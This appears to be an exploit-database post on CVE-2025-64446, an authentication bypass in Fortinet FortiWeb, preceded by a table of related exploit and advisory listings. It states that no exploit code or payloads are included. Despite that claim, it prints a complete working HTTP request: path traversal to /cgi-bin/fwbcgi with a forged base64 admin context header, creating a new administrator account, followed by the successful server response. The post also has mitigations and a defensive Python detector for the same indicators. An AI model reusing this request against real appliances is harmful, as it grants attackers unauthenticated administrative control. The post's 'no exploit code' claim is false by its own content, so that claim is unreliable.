| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for OS Command Injection in Fortinet Fortiweb | 4 Mar 2026 08:31 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 26 Mar 2026 11:29 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 21 Nov 2025 00:37 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 18 Nov 2025 10:25 | – | githubexploit |
| Exploit for CVE-2025-58034 | 19 Nov 2025 09:52 | – | githubexploit |
| Exploit for OS Command Injection in Fortinet Fortiweb | 2 Mar 2026 14:36 | – | githubexploit |
| CVE-2025-64446 | 14 Nov 2025 15:42 | – | circl |
| Fortinet FortiWeb Path Traversal Vulnerability | 14 Nov 2025 00:00 | – | cisa_kev |
| CISA Adds One Known Exploited Vulnerability to Catalog | 14 Nov 2025 12:00 | – | cisa |
| Fortinet Releases Security Advisory for Relative Path Traversal Vulnerability Affecting FortiWeb Products | 25 Nov 2025 12:00 | – | cisa |
# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446
# Author: nu11secur1ty
# Date: 11/17/2025
# Vendor: https://www.fortinet.com/
# Software: v8.0.0
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-64446
## Description:
## Overview
This document provides a **research-grade analysis** of CVE-2025-64446, an
authentication bypass vulnerability discovered in Fortinet FortiWeb
appliances.
It is intended *only* for academic, defensive security testing in
controlled lab environments.
- No exploit code is included in this document.
---
## Vulnerability Summary
CVE-2025-64446 enables an attacker to interact with administrative API
endpoints **without valid authentication**, due to improper trust
validation in a CGI parsing flow.
A malicious request can trigger the backend logic responsible for
administrative actions, bypassing permission checks.
Impact includes:
- Unauthorized access to sensitive endpoints
- Potential privilege escalation
- Unauthorized configuration changes
- Administrative user creation
---
## Root Cause (High-Level)
During analysis, researchers observed:
- The endpoint `/cgi-bin/fwbcgi` incorrectly trusted data passed through a
crafted context header.
- Parameter parsing logic allowed insecure inheritance of admin privileges.
- Failure in validating serialized/encoded CGI metadata.
This combination enabled unauthorized execution of administrative actions.
---
## Observed Response Behavior (Sanitized)
A vulnerable system may return HTTP `200 OK` to unauthorized admin-level
operations.
Example (sanitized):
```
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"code": 0,
"message": "Operation completed"
}
```
---
## Reproduction (Laboratory Only)
This section describes the workflow **without revealing technical
payloads**:
1. Configure a security testing proxy (e.g., Burp).
2. Intercept traffic destined for FortiWeb.
3. Send a crafted administrative action request.
4. Observe whether the target responds with unauthorized administrative
success.
5. Capture response artifacts for documentation.
Researchers should generate their own payloads in private lab environments.
## Burp:
- Request:
```
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 10.10.0.13
Accept-Encoding: gzip, deflate, br
Content-Length: 824
CGIINFO:
eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
Content-Type: application/json
Connection: keep-alive
{"data": {"q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin",
"access-profile_val": "0", "trusthostv4": "0.0.0.0/0", "trusthostv6":
"::/0", "last-name": "", "first-name": "", "email-address": "",
"phone-number": "", "mobile-number": "", "hidden": 0, "comments": "",
"sz_dashboard": -1, "type": "local-user", "type_val": "0",
"admin-usergrp_val": "0", "wildcard_val": "0", "accprofile-override_val":
"0", "sshkey": "", "passwd-set-time": 0, "history-password-pos": 0,
"history-password0": "", "history-password1": "", "history-password2": "",
"history-password3": "", "history-password4": "", "history-password5": "",
"history-password6": "", "history-password7": "", "history-password8": "",
"history-password9": "", "force-password-change": "disable",
"force-password-change_val": "0", "password": "1a1222a0"}}
```
- Response:
```
HTTP/1.1 200 OK
Date: Mon, 17 Nov 2025 19:44:55 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src
'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src
'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self';
upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1204
{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1,
"name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val":
"1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name":
"", "first-name": "", "email-address": "", "phone-number": "",
"mobile-number": "", "hidden": 0, "domains": "root ",
"gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "",
"sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val":
"0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX",
"wildcard": "disable", "wildcard_val": "0", "accprofile-override":
"disable", "accprofile-override_val": "0", "fortiai": "disable",
"fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763408695,
"history-password-pos": 1, "history-password0": "ENC XXXX",
"history-password1": "ENC XXXX", "history-password2": "ENC XXXX",
"history-password3": "ENC XXXX", "history-password4": "ENC XXXX",
"history-password5": "ENC XXXX", "history-password6": "ENC XXXX",
"history-password7": "ENC XXXX", "history-password8": "ENC XXXX",
"history-password9": "ENC XXXX", "force-password-change": "disable",
"force-password-change_val": "0", "feature-info-ver": "" } }
```
---
## Mitigation & Recommendations
Likely mitigations include:
- Apply official vendor patches immediately.
- Disable exposed management interfaces from public networks.
- Enforce strict role-based access controls.
- Implement WAF rules to block malformed CGI context headers.
- Monitor logs for suspicious admin actions.
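As an added illustration of the last two recommendations (not code from the original post or from Fortinet): a small Python check that flags the two indicators visible in the capture above, a percent-encoded path that resolves onto `/cgi-bin/fwbcgi` and a client-supplied `CGIINFO` header. The sample requests, the hostname and the header value are constructed for this example.

```python
import base64
import json
import posixpath
from urllib.parse import unquote

# Constructed sample request heads modelled on the capture above; the host
# and the CGIINFO value ({"username": "admin"}) are made up for this example.
SAMPLE_REQUESTS = [
    "POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1\r\n"
    "Host: fortiweb.lab.example\r\n"
    "CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiJ9\r\n"
    "Content-Type: application/json\r\n\r\n",
    "GET /api/v2.0/cmdb/system/admin HTTP/1.1\r\n"
    "Host: fortiweb.lab.example\r\n"
    "Authorization: Bearer placeholder-token\r\n\r\n",
]

def parse_request(raw):
    """Split a raw HTTP request head into (method, raw path, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, raw_path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, raw_path, headers

def assess_request(raw):
    """Return indicator strings for one request; an empty list means nothing was flagged."""
    _method, raw_path, headers = parse_request(raw)
    # Decode before normalising: the %3f hides a '?' that a naive query split
    # would treat as the end of the path, so the traversal behind it is kept.
    decoded = unquote(raw_path)
    normalized = posixpath.normpath(decoded)
    findings = []
    if "/../" in decoded and normalized.startswith("/cgi-bin/"):
        findings.append("traversal to " + normalized)
    # CGIINFO is an internal context header; an external client never needs to send it.
    cgiinfo = headers.get("cgiinfo")
    if cgiinfo is not None:
        try:
            ctx = json.loads(base64.b64decode(cgiinfo, validate=True))
            user = ctx.get("username") if isinstance(ctx, dict) else None
            findings.append("cgiinfo claims user " + str(user))
        except ValueError:
            findings.append("cgiinfo header present but not decodable")
    return findings
```

The same two checks translate directly into a WAF or proxy rule: reject any externally received `CGIINFO` header, and reject paths whose decoded, normalised form leaves the `/api/` prefix.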
---
## Ethical Notice
This documentation is for **defensive research only**.
Please don't test systems you do not own or have explicit permission to
assess.
# Reproduce:
[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)
# Demo:
[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)
# Time spent:
03:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>